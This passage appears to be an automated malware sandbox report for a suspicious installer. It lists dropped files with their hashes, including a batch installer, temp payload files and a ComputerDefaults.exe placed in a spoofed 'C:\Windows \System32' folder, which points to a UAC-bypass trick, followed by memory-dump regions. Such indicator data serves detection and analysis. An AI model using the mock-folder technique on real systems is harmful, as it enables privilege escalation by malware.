029fa38890ea57afc81948b6f36cdb0f99865acaf72c0b260e46554b8dae907a

SHA512
040eb168062c59621e8bee699c1c537ad57a3e5726821ed8cb02d4fecd291a505948ad1ce3e44cc42a1ef91ee8315e4daca17ef09bf804e19aac9aaa4bff9523

Download Submit
C:\Users\Admin\AppData\Local\Temp\Genre
Filesize
45KB

MD5
fbf050617611a6280df7fa7931c0e42a

SHA1
9a4fa456476c41a312ae3c9981b71347ae7ddc8f

SHA256
b51c80fdbed5a545ec88f2921a2734599d37a2970b652cd9059e37111d642e37

SHA512
623c7e979e477713031b74aef8a475ab52ed3ae36193a415a677fd29b8db411e9cd1da0d235a3d50e7598f04c53d1a27e5fa27be699dfcb58b7202979b1f2075

Download Submit
C:\Users\Admin\AppData\Local\Temp\Hay
Filesize
54KB

MD5
8ac9860944033e06f82c8d490bdf5198

SHA1
bcc32f60bb02acc2117d1422273a1200bc56ea0c

SHA256
9b65bcec2525c73fa082a70d15624303393821460f100f9ef624dfb3e717a3bd

SHA512
3758c6ba128d43e18536888ca77297e82ef788262276d31ed06dcf2f8ed7d463b2db38ebb35b3cea1941f04476a4fb4a58550cfb24e7f0e6dde6bf53da08841b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Instance
Filesize
16KB

MD5
b95f7783df284cc628960d74b5acd7cf

SHA1
4e25b8f325f32819e3a9396721565112eee26666

SHA256
e3d12562840adda799aaac224b2cd7c3bda72dfbf0aeb44286b26dfc8c68b943

SHA512
9dc2a49cbf9c92fff4bbeaddae8b3feefe94441bbbefa905d203c9ebd636af3c97c9b09734584b4043143da8397a6eb774ea10d8ec1af2e10ecb518a9a98fdad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kde
Filesize
48KB

MD5
3db00611aab74614fbea0112ff8fdd4d

SHA1
8c24e20595dceac9c4bbe89716027e569a2954c5

SHA256
42d75f632fea47ace1263f1bec0c832ed036e7ec67ea04d04e5f2f5d6d84801e

SHA512
38b9e60c64fa1a52d75e63f112ed2c0927605c6370b5f6555a953ef2cd9ec423b43e892841bbe38c93c63066e759737e7a0309b91aeed74efb5977d5f223e07e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Lcd
Filesize
33KB

MD5
b9c0bf241a202d4d29d915493a26805f

SHA1
5f44541e42e3c131b5e0a754cc16cd9940850242

SHA256
9422005aa66cf58ad1433e8a628d12037cb14fb191045c7673cdf9e490c3738d

SHA512
ae7bdb30ce44187919656bb1efd1f805db256a7c7cc4e8c4386df10d850ef11e294f7311c5e78dfe4fc04d07dff772b907b078251bd9cdbcdceef0aafc6d955c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Older
Filesize
47KB

MD5
0e78d8aae2d32637849e0fcf2a80e2d7

SHA1
46bf2cfce80aaf8c3a7932bce7e0ea3d08056eec

SHA256
f4fa783e6bdd5d2805cc6c903449ad718c206b90ec47992766ca9d99d1a7e65c

SHA512
023f3cf1f85a4a724f6b0c528a9d4703824217b22966fb975fac0b26f02d26f8434ebcecf70c5ce7701532b1e08f04835ca398d5ce6fa99849a4e8aa59eefc54

Download Submit
C:\Users\Admin\AppData\Local\Temp\Opposition
Filesize
42KB

MD5
5a7165369a23409ccd989acc5c1ab39d

SHA1
30747fcbc0b843be358282fb4d654932cca98501

SHA256
9c36d88810639d3b3f080e04b9e92188fd5a2e858a85ce1a01be0a50f1f7db1a

SHA512
ef363e37389a0ced80352b12e4a684e0dfba4afdb2df80b3c727ea34644d05cba421e88c11d79e49634c83055b51a010881caf7c46d085086b23f7953a1455ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Participants
Filesize
228B

MD5
31050816b2f450a717786d075367899e

SHA1
a7ade2bf93708934b9e276fce3aa2323a25e007d

SHA256
4a6fcc7e68d22a69db4735d3900f3ea63f767d67218610afd43ea8f1af9b4fb5

SHA512
d588927f8fdcc0e7468a5a2839537cb3a4f2ff7d942c63eb8b20e53ccdf9dba63a394bc75e67f0395b5525382cb33eb81bcb55995b29b9d7e357361900c332b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Portraits
Filesize
37KB

MD5
02e8d9cc2c371e031c04fb6411bce4ba

SHA1
11c1888bfa2a3ca6db2c9d12bc5c0461ce58ec66

SHA256
4c820fc453c8d4dc8b78ddb65cfdaf5d01cae9bc2f20c58ddf825d557d7ce40a

SHA512
8ffc732a24dfbca1f844a6e048de6c12f20c9c00088b3da5c28f9101e0eac08c4d1a6788381c931861271d7b7f9a790bb958ccdeeac659e897f3c0058eb3efe9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Quebec
Filesize
43KB

MD5
1abc7e16eec76c979fef6fdf5be5adf6

SHA1
37a9e2afaa1d4f073ce1642ea044755b2323774a

SHA256
f2f5ba6c17eb0a021e485b367ad56e253091f1111914a32f3f6307135b5e7a3e

SHA512
8dec93f2ba0dfba94bbe838345a403cb43d83becd82bd153b69d8bd80699294f967814b15e1be565fa94374d24ad720f60228ab865528735208353927c53d4bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Race
Filesize
20KB

MD5
40d6b51698bdd7415e34eaee5a130441

SHA1
70e03445ecca7ac04f7834611487b2a45be99745

SHA256
09a0342a2deb9825376371eef3165c14a28eaa46eb70da9b0fd096f5e9da8a5e

SHA512
d2f552f00a6d956d2820e521a8be3f506315ce6684bb5e8467517fb297fca4df526fd7389228c42c3b1496c862a22616e2abbbe32dc42a156457e3d1f555662d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Referring
Filesize
9KB

MD5
3595bc300ce4dace271ce6578756b21d

SHA1
f0721edea582261c6a2090db21bffc2c71632243

SHA256
0f466f970cba28a66f00078c00706f4cd5638e85a334483c97371018760123ec

SHA512
e6d3b38b2d50fcffcdd6754990e7b079b91f843c06af654541dc435fd2349556805151189c86e1bef9efc0b630befa1e51f9e5f1e26fa135b794ee614617d65b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Reproductive
Filesize
105KB

MD5
62384fff0ebfda7b8935f42cce55de2f

SHA1
3e16f3bbaee22a73daa7132e9d75e8409b0f2ad2

SHA256
d454e68a2faa8efe256ca247aa40c040941fe9e2aaec65d82ecf2dc4942803e8

SHA512
8118272c64135a4c22f764317d4d1218c8e42d6ae21091dd45db72726c058d14d9274b88c01d40eb8d5f5536976e2548ec94d173b5a0098eded439a8673ff5b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Richmond
Filesize
41KB

MD5
b488aab0dfb4030d842aec0a6e26e42d

SHA1
71805345608afa1d00616fa2484849372215a3b4

SHA256
b36d1f26d6d5c2089434e781b211954744eee20e78fbebd45449ed2ea9b856b5

SHA512
b0f18e2c9659a549b49210fdf24edea9293750faa5ccf61412db3c8d7371b9a92e470dfab93a8661dd9d150bad1a499aac0ecaac42411a857e373aa05874451e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Seek
Filesize
14KB

MD5
39230f08bfbc6c5c3c011b6a220df85e

SHA1
cde56ea4662b2e36365ebb335b2f469c37fb0275

SHA256
5db2ae5096857702aff3c2b7fe1ba276cc4f83e9f10145fdd896a7e8da3e03ee

SHA512
fafef531b4998091c0e264867b5d324951e951a48b4a67f8a234505476b3d5215e84eefa3960a634493dd4092ae4da2eddcb38fb83ba52c5f6711b9dca4d5e8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Sn
Filesize
33KB

MD5
bf49c1fbe47f090b82ffe66b36603df6

SHA1
70dfbec05b82f0d5ab6caaf16630d3cef8174fa4

SHA256
6cdbb5e1e889e4e0e555eefb72d6d465ae9b0f7b31381540979739b60737554d

SHA512
7fa8af37ac249bcecb6c10563082efe15c152ea325c3d2ec220f523677da3317bd50f8861ca03185282374875dbf4d8028e1f26c925b33add2d764e9eb0bfa8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Studios
Filesize
55KB

MD5
f7ec2f3666d9aedb7ccf40596a0c65ae

SHA1
c3ad9cf0b992b0312f4c4965e4cd8d7e526bfc78

SHA256
86b729ecd4308f15d4435eb879dc3175dd6fe375fd96d6f59accd612cdfd434d

SHA512
d8f859bb3cb41be23b997c2ac2cd6cef912d0ffa6cd3480a3a506d8b9ce12d969240cd87be5339e172885b096b9d30dbc4f7ef2d69b7d63e6eb33b7d109eddaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tags
Filesize
35KB

MD5
a4c370b1694c89138b285ffcbfe23438

SHA1
1eb5d89e364d9a5f56059050db1151ef2ee2e9df

SHA256
e3854f72e4feea8569208dba14321102a4676a15d0d38ebee6fcca52bb1f0937

SHA512
c660c2ac74effe602af708608cf4e2316914ac596ef43c4e1e2e47e22154b0b8df44c2370828ac0f935000ea3932e610413559ee6fa3289865ed7507cc623c95

Download Submit
C:\Users\Admin\AppData\Local\Temp\Thereof
Filesize
620B

MD5
c01790f3cef20061f828578069162760

SHA1
72a450b13fd37f6c5c95d94240c51354316d5962

SHA256
328d81768d3cb94a93c1d689ed4b571753d59309f44954e83ee9d3966369325b

SHA512
4350a43ddef179c199ea55acba477b57490f2434eb45cea9b3f9ebca9f4b3615c41bc38f19570bd2a1188fecc472c5406ef2d1637b16a55deb5814ab2b785fab

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpA10F.tmp
Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tokyo
Filesize
36KB

MD5
7055ceb870bbc64f416e158196b6b434

SHA1
7afacc0a2a2543f9c19cb646560ac7605d58bb50

SHA256
1128a9df81e57e6cc8bbd86128d4c5cff054b99cdd01ec8d21eee2eb5c72ee49

SHA512
31d268453f25c73c9c1b547fe766ba3a61995fbdf86215bfc9f80b2b3d0289d49fc480c492af6358e66b9f1379fc0b060ec97e14b6dc41be09180ce5a2fdc41e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Violence
Filesize
35KB

MD5
484ae53285f06d2f40ca4690fd18fc7b

SHA1
f4c07e5ba398299118e70b0cf2830bf6987dc9ab

SHA256
169425322e927ac9a3f05acb81df6386df60aa64b70cfd01207562181d5a4780

SHA512
9ca81f715dbf6c1838acf99a9fb00b09b5816ba4fb0bc1689a57c2dd55aae2118adf50891ea39ac7075d592cef7f6b944275d56b828cdbc0ca701042ff4b2df2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tkkuewvj.bx5.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\App.config
Filesize
184B

MD5
28960c034283c54b6f70673f77fd07fa

SHA1
914b9e3f9557072ea35ec5725d046b825ef8b918

SHA256
8d65429e0b2a82c11d3edc4ea04ed200aedfea1d7ef8b984e88a8e97cff54770

SHA512
d30dd93457a306d737aac32c0944880517ed4c3e8f2d1650ffca6c1d98e892082b41b40fb89ccf75d5f03d2464b0b4f943cd4b082071f0abfe978d149bd61479

Download Submit
C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\Installer_x86.64.bat
Filesize
318KB

MD5
46159d1f082533733deb4efbbca6feb6

SHA1
5cbab5a2b2fc158794a6ffcab13798a2c530a9ab

SHA256
cc9ac5f20e9f70c3138881b9787c48964916f4a743b8f845f125c1b62b38bc62

SHA512
80580c33976c4b8a0c20dc7f230cc9f25c4e88fca66e52e5e9f3ba6e6c7d46fa33b90ad8b946e8fbfb384320d277fba5ec82ff960435004bdfb1f0bc79d04f0d

Download Submit
C:\Users\Admin\Downloads\em_6hvuwiqE_installer_Win7-Win11_x86_x64\Setup.exe
Filesize
950KB

MD5
ba132ddb78e2f0e8633051b5b2766c9c

SHA1
16554fdd3a67692e8042079bd5656e8c683c18ee

SHA256
60b2039ff2d4f6b4f4afd083eaa3f53e06d9321f70f18729047e0bc2a9f433e5

SHA512
54dae3845f9cee5bceaf3cb7e0a001307a39a1d436a559a5966daa85d66907c81e5475ed0ff8ff0c8c30f5f6200de83bf9dd90344bb88bb91a68c06ab9bd2dc9

Download Submit
C:\Windows \System32\ComputerDefaults.exe
Filesize
62KB

MD5
0e0ec4a3677b39f02c7f9ba09430867e

SHA1
39971c4372630fee7ee243a684dddc902d7fb7af

SHA256
a533a1c2994d15071ce7d5b5ccd220f9e1eff97728065a834f362133f5199ac8

SHA512
0b51cc575996fd770cad42af78c6d0f224af59f280e574244f4c364c7990ba7f58b1db042da83223963e92d4febe374c24c54f03487cb3c9ba33a183e2e40e47

Download Submit
C:\Windows\Installer\MSI154B.tmp
Filesize
284KB

MD5
8d992a2126c1d93fe274057e6d4fb1d0

SHA1
bab132d4923c48b88b746f48114564cfae8184a5

SHA256
6c435a95b9ded21a2c27bfdfb096de2367a9e4f8e002a3dbb6aa6f52b6409276

SHA512
136babf8a8f2053e0c4d1d10c345b4b47dde10f15e230a4e914f3c72eb1144ccded421b2d47ad428a02c4273ac124a86e3e32222b0f1b24f69e22a221001869d

Download Submit
C:\Windows\Installer\MSI15C9.tmp
Filesize
203KB

MD5
d53b2b818b8c6a2b2bae3a39e988af10

SHA1
ee57ec919035cf8125ee0f72bd84a8dd9e879959

SHA256
2a81878be73b5c1d7d02c6afc8a82336d11e5f8749eaacf54576638d81ded6e2

SHA512
3aaf8b993c0e8f8a833ef22ed7b106218c0f573dcd513c3609ead4daf90d37b7892d901a6881e1121f1900be3c4bbe9c556a52c41d4a4a5ec25c85db7f084d5e

Download Submit
\??\pipe\crashpad_4412_ZCPBUQAZLBLVEJOP
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/304-6217-0x0000000002D00000-0x0000000002DAE000-memory.dmp

Filesize
696KB

Download
memory/396-1260-0x0000000009980000-0x000000000999A000-memory.dmp

Filesize
104KB

Download
memory/396-1059-0x00000000096C0000-0x00000000096F3000-memory.dmp

Filesize
204KB

Download
memory/396-1061-0x00000000094A0000-0x00000000094BE000-memory.dmp

Filesize
120KB

Download
memory/396-1060-0x000000006CA20000-0x000000006CA6B000-memory.dmp

Filesize
300KB

Download
memory/396-1066-0x0000000009800000-0x00000000098A5000-memory.dmp

Filesize
660KB

Download
memory/396-1067-0x00000000099E0000-0x0000000009A74000-memory.dmp

Filesize
592KB

Download
memory/396-1265-0x0000000009970000-0x0000000009978000-memory.dmp

Filesize
32KB

Download
memory/404-7601-0x0000000000630000-0x000000000063A000-memory.dmp

Filesize
40KB

Download
memory/404-7602-0x0000000005020000-0x0000000005034000-memory.dmp

Filesize
80KB

Download
memory/404-7603-0x00000000059C0000-0x0000000005A18000-memory.dmp

Filesize
352KB

Download
memory/2688-1036-0x0000000009B70000-0x0000000009BB0000-memory.dmp

Filesize
256KB

Download
memory/2688-1034-0x0000000009900000-0x000000000990A000-memory.dmp

Filesize
40KB

Download
memory/2688-1566-0x0000000007170000-0x00000000071C2000-memory.dmp

Filesize
328KB

Download
memory/2688-983-0x0000000007570000-0x0000000007592000-memory.dmp

Filesize
136KB

Download
memory/2688-981-0x0000000004E80000-0x0000000004EB6000-memory.dmp

Filesize
216KB

Download
memory/2688-982-0x00000000078B0000-0x0000000007ED8000-memory.dmp

Filesize
6.2MB

Download
memory/2688-1022-0x0000000009820000-0x000000000983A000-memory.dmp

Filesize
104KB

Download
memory/2688-1021-0x0000000009EA0000-0x000000000A518000-memory.dmp

Filesize
6.5MB

Download
memory/2688-1008-0x0000000008930000-0x000000000896C000-memory.dmp

Filesize
240KB

Download
memory/2688-989-0x0000000008300000-0x000000000831C000-memory.dmp

Filesize
112KB

Download
memory/2688-986-0x0000000007F70000-0x00000000082C0000-memory.dmp

Filesize
3.3MB

Download
memory/2688-985-0x00000000077F0000-0x0000000007856000-memory.dmp

Filesize
408KB

Download
memory/2688-984-0x0000000007710000-0x0000000007776000-memory.dmp

Filesize
408KB

Download
memory/2692-1344-0x0000000009B30000-0x0000000009BD5000-memory.dmp

Filesize
660KB

Download
memory/2692-1339-0x000000006CA20000-0x000000006CA6B000-memory.dmp

Filesize
300KB

Download
memory/4136-971-0x0000000005CF0000-0x0000000005D66000-memory.dmp

Filesize
472KB

Download
memory/4136-954-0x0000000005800000-0x000000000580A000-memory.dmp

Filesize
40KB

Download
memory/4136-977-0x0000000006AB0000-0x0000000006AEE000-memory.dmp

Filesize
248KB

Download
memory/4136-976-0x0000000006A50000-0x0000000006A62000-memory.dmp

Filesize
72KB

Download
memory/4136-975-0x0000000006B20000-0x0000000006C2A000-memory.dmp

Filesize
1.0MB

Download
memory/4136-974-0x0000000006FB0000-0x00000000075B6000-memory.dmp

Filesize
6.0MB

Download
memory/4136-978-0x0000000006C30000-0x0000000006C7B000-memory.dmp

Filesize
300KB

Download
memory/4136-1030-0x0000000007A90000-0x0000000007C52000-memory.dmp

Filesize
1.8MB

Download
memory/4136-972-0x0000000006880000-0x000000000689E000-memory.dmp

Filesize
120KB

Download
memory/4136-953-0x0000000005700000-0x0000000005792000-memory.dmp

Filesize
584KB

Download
memory/4136-952-0x0000000005DF0000-0x00000000062EE000-memory.dmp

Filesize
5.0MB

Download
memory/4136-1033-0x0000000007A10000-0x0000000007A60000-memory.dmp

Filesize
320KB

Download
memory/4136-949-0x00000000011A0000-0x00000000011F2000-memory.dmp

Filesize
328KB

Download
memory/4136-1031-0x0000000008190000-0x00000000086BC000-memory.dmp

Filesize
5.2MB

Download
memory/4892-1460-0x000000006CA20000-0x000000006CA6B000-memory.dmp

Filesize
300KB

Download